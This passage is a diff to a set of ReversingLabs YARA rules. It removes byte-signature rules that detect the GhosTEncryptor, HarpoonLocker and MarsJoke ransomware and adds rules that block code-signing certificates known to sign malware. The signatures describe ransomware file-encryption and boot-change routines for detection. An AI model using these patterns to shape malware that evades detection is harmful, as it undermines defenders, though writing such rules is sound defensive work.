-            55 B8 ?? ?? ?? ?? 89 E5 E8 ?? ?? ?? ?? 29 C4 8D 45 ?? 89 8D ?? ?? ?? ?? 89 A5 ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C9 C2 ?? ??
-            8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44
-            24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 75 ?? EB
-            ?? 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 85 ?? ?? ?? ?? 83 85 ?? ??
-            ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 83
-        }
-		$enum_resources_p2 = {
-            8B 85 ?? ?? ?? ?? F6 40 ?? ?? 74 ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 85 D2 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ??
-            ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 48 ?? 3B 48 ?? 0F 84 ?? ?? ??
-            ?? 85 C9 74 ?? 8D 41 ?? 8B 95 ?? ?? ?? ?? 89 01 8B 85 ?? ?? ?? ?? 01 C2 89 04 24 89
-            54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B
-            48 ?? 8B 85 ?? ?? ?? ?? 83 C1 ?? 89 48 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 39 C8
-            0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 84 ?? ??
-            ?? ?? 89 04 24 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC
-            ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 8D ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? EB
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MS CORP SOFTWARE LTD" and ( pe.signatures [ i ] . serial == "00:b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09" or pe.signatures [ i ] . serial == "b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09" ) and 1590710400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_3A1B397Fd9451E3B5891Fc69681Ed73D : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "6bdba43f-4003-5807-9adc-20691fbc8d14"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16764-L16780"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ca43c7bacd8cb5a896c3135abf4a131bdb4a7f5093e64c8d1df743fad0c1c64a"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Zhang" and pe.signatures [ i ] . serial == "3a:1b:39:7f:d9:45:1e:3b:58:91:fc:69:68:1e:d7:3d" and 1470614400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostencryptor : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Eb816Aa49E4894D9E9F78729E53Cd48 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GhosTEncryptor ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9f035e39-e0fe-54f3-8206-08fbbd9206b4"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "d2e66765-bdf6-59ff-ac6c-1a82ecefa731"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.GhosTEncryptor.yara#L1-L69"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "85c1f6e5acf746388b0a9ddeb1f0ad1d2219fff7358c9a981849863155c13e3c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16782-L16798"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4e22568612aec050c7f78b81ba6749528a9c25c0ba43e14260a581a9bea7a2f0"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GhosTEncryptor"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_folders = {
-            17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 03 28 ?? ?? ?? ?? 0B 16 0C 38 ?? ?? ?? ??
-            07 08 9A 0D 02 09 28 ?? ?? ?? ?? 2C ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 02 7B ?? ?? ?? ?? 09 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 09 28 ?? ?? ?? ?? 26 08 17 58 0C 08 07 8E 69 3F ??
-            ?? ?? ?? 02 7B ?? ?? ?? ?? 06 17 6F ?? ?? ?? ?? 2A
-        }
-		$encrypt_folder_p1 = {
-            1F ?? 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ??
-            ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72
-            ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ??
-            A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72
-        }
-		$encrypt_folder_p2 = {
-            A2 0A 03 28 ?? ?? ?? ?? 0B 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 07 09 9A 28 ?? ?? ?? ?? 13
-            ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 07 09 9A 04 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69
-            32 ?? 16 13 ?? 2B ?? 02 08 11 ?? 9A 04 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 08 8E 69
-            32 ?? 2A
-        }
-		$deep_search_p1 = {
-            17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 7E ?? ?? ?? ?? 0B 02 0C 16 0D 38 ?? ?? ??
-            ?? 08 09 9A 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
-            ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72
-        }
-		$deep_search_p2 = {
-            6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 07 11 ?? 72 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 0B 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 09 17 58 0D 09 08 8E
-            69 3F ?? ?? ?? ?? 07 06 17 6F ?? ?? ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_folders ) and ( all of ( $deep_search_p* ) ) and ( all of ( $encrypt_folder_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x96\\x84\\xE5\\x90\\x9B \\xE9\\x9F\\xA6" and pe.signatures [ i ] . serial == "1e:b8:16:aa:49:e4:89:4d:9e:9f:78:72:9e:53:cd:48" and 1429056000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Harpoonlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_383Ca88D6D9379C740609560 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects HarpoonLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3605d354-5a33-54b1-83ad-ad514c78357b"
-		date = "2022-01-27"
-		modified = "2022-01-27"
+		id = "46166e9e-515d-530a-a651-59821d979f01"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.HarpoonLocker.yara#L1-L96"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "20587f9dce5981934498d9979843a090224ba649def8b694adf7799b7060cc25"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16800-L16816"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ce41d046a7ca320d034fa226b5e8c22022cc6bfc97eb9ef294b1aca232aaacef"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HarpoonLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 6F
-            ?? ?? ?? ?? 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 25 06 07 9A 7D
-            ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ?? 26 07 17 58 0B 07 06 8E
-            69 32 ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 73 ?? ?? ?? ?? 0D
-            09 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ??
-            ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 12 ??
-            12 ?? 28 ?? ?? ?? ?? 12 ?? 12 ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 59 13 ?? 72 ?? ?? ?? ?? 11
-            ?? 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 2C ?? 20 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 2B ?? 2A
-        }
-		$encrypt_files_p2 = {
-            12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 02 16 12 ?? 28
-            ?? ?? ?? ?? 26 08 7B ?? ?? ?? ?? 0D 08 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 35 ?? 08 7B ?? ??
-            ?? ?? 16 36 ?? DD ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 10 ?? 03 03 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 03 6F ?? ?? ?? ?? 16 11 ?? 16 1F ?? 28 ?? ?? ?? ?? 03
-            6F ?? ?? ?? ?? 16 11 ?? 1F ?? 1F ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 1F ?? 6A
-            13 ?? 17 13 ?? 09 6E 13 ?? 2B ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 59 13 ?? 11 ?? 11 ?? 30
-            ?? 02 19 17 7E ?? ?? ?? ?? 19 20 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ??
-            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 09 20 ??
-            ?? ?? ?? 58 14 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ??
-            06 1F ?? 16 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ??
-            DD ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 16 13 ?? 16 13 ?? 2B ?? 11 ?? 20 ?? ?? ?? ?? 2F
-            ?? 09 6E 11 ?? 6A 59 13 ?? 11 ?? D4 8D ?? ?? ?? ?? 13 ?? 11 ?? 17 58 11 ?? 33 ?? 11 ??
-            D4 8D ?? ?? ?? ?? 13 ?? 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 8E 69 28 ?? ?? ?? ?? 11
-            ?? 18 5D 2D ?? 11 ?? 8E 69 1F ?? 33 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 07 11
-            ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 11 ?? 11 ?? 8E 69 58 13 ?? 11 ?? 17 58 13
-            ?? 11 ?? 11 ?? 3F ?? ?? ?? ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 16 07 09 28 ?? ?? ?? ??
-            11 ?? 8E 69 28 ?? ?? ?? ?? 2B ?? 11 ?? 16 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ??
-            ?? ?? DE ?? 26 DE ?? 26 DE ?? 00 07 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 00 06 28 ?? ?? ??
-            ?? 26 DE ?? 26 DE ?? DC 2A
-        }
-		$find_files = {
-            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 2C ?? 2A 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ??
-            ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 14 0B 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B DE ?? 26
-            DE ?? 07 2C ?? 07 8E 16 FE 01 2B ?? 17 0C 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13
-            ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 08 2C ?? 11 ?? 7B ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ??
-            26 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 08 2C ?? DD ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17
-            6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 07 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ??
-            ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ??
-            7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ?? ?? ?? ?? 11 ?? FE 06 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 11 ?? 7B ?? ?? ?? ?? 09 28 ?? ?? ?? ?? DE
-            ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 09 6F ?? ?? ?? ?? DE ?? 26 DE
-            ?? DE ?? 26 DE ?? 2A
-        }
-		$change_boot = {
-            02 8E 2C ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 16 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 28 ??
-            ?? ?? ?? 2A 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 28 ?? ?? ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $change_boot ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "38:3c:a8:8d:6d:93:79:c7:40:60:95:60" and 1478250214 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Marsjoke : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6731Cb1430F18B8C0C43Ab40E1154169 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MarsJoke ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8164c586-f548-5414-9df8-61e0c51cbe29"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "df2423da-37ec-5adc-8497-2ac975b0b7ff"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.MarsJoke.yara#L1-L157"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "298b2fd99793a15b3537853289e1337648d3fa84f12038e6f6831741404b7c5c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16818-L16834"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c05349166919ffc18ac6ecb61b822a8365f87a82164c5e110ef94345bdc4de6f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "MarsJoke"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_and_encrypt_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 45
-            ?? 53 56 89 44 24 ?? 8B 45 ?? 57 89 44 24 ?? 8B 45 ?? BE ?? ?? ?? ?? 33 DB 56 89 44
-            24 ?? 8D 84 24 ?? ?? ?? ?? 8B F9 53 50 89 7C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 56 8D 84 24 ?? ?? ?? ?? 53 50 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 57 8D 4C 24 ?? 88 5C 24 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 38 5C 24 ?? 0F 85 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 59 BE ?? ?? ??
-            ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 FF
-            74 24 ?? FF D7 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 84 C0 8D 84 24 ?? ?? ?? ?? 75 ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? E9 ?? ?? ?? ??
-            6A ?? 50 FF D7 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D
-            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E9 ?? ?? ?? ?? 8D 4C
-            24 ?? 51 50 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ??
-            ?? 89 5C 24 ?? 33 DB 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 53 50 89 54 24
-            ?? 89 4C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 8D 84 24
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 56 8D 84 24 ?? ?? ?? ?? 50 FF
-            D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 56 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ??
-            ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 6A ?? 59 33 C0 66 89 9C 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB 6A ?? FF
-            74 24 ?? 66 AB 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
-            ?? 57 53 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 0B 44 24 ?? 74 ?? 83 44
-            24 ?? ?? 11 5C 24 ?? EB ?? 89 7C 24 ?? 89 5C 24 ?? BF ?? ?? ?? ?? 57 E8 ?? ?? ?? ??
-            59 50 57 8B 7C 24 ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 47 ?? 8B 44 24 ?? 53
-            89 47 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 57 FF 74 24 ?? C7 47 ?? ?? ?? ?? ?? 88 5C 24
-            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? 3B FB 89
-            5C 24 ?? 0F 8C ?? ?? ?? ?? 7F ?? 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 8B 74 24 ?? 83 EE ??
-            1B FB 89 74 24 ?? 89 7C 24 ?? 89 5C 24 ?? 33 C0 EB ?? 8B 7C 24 ?? 8B 74 24 ?? 39 74
-            24 ?? 75 ?? 3B C7 75 ?? 8B 44 24 ?? 89 44 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 68 ??
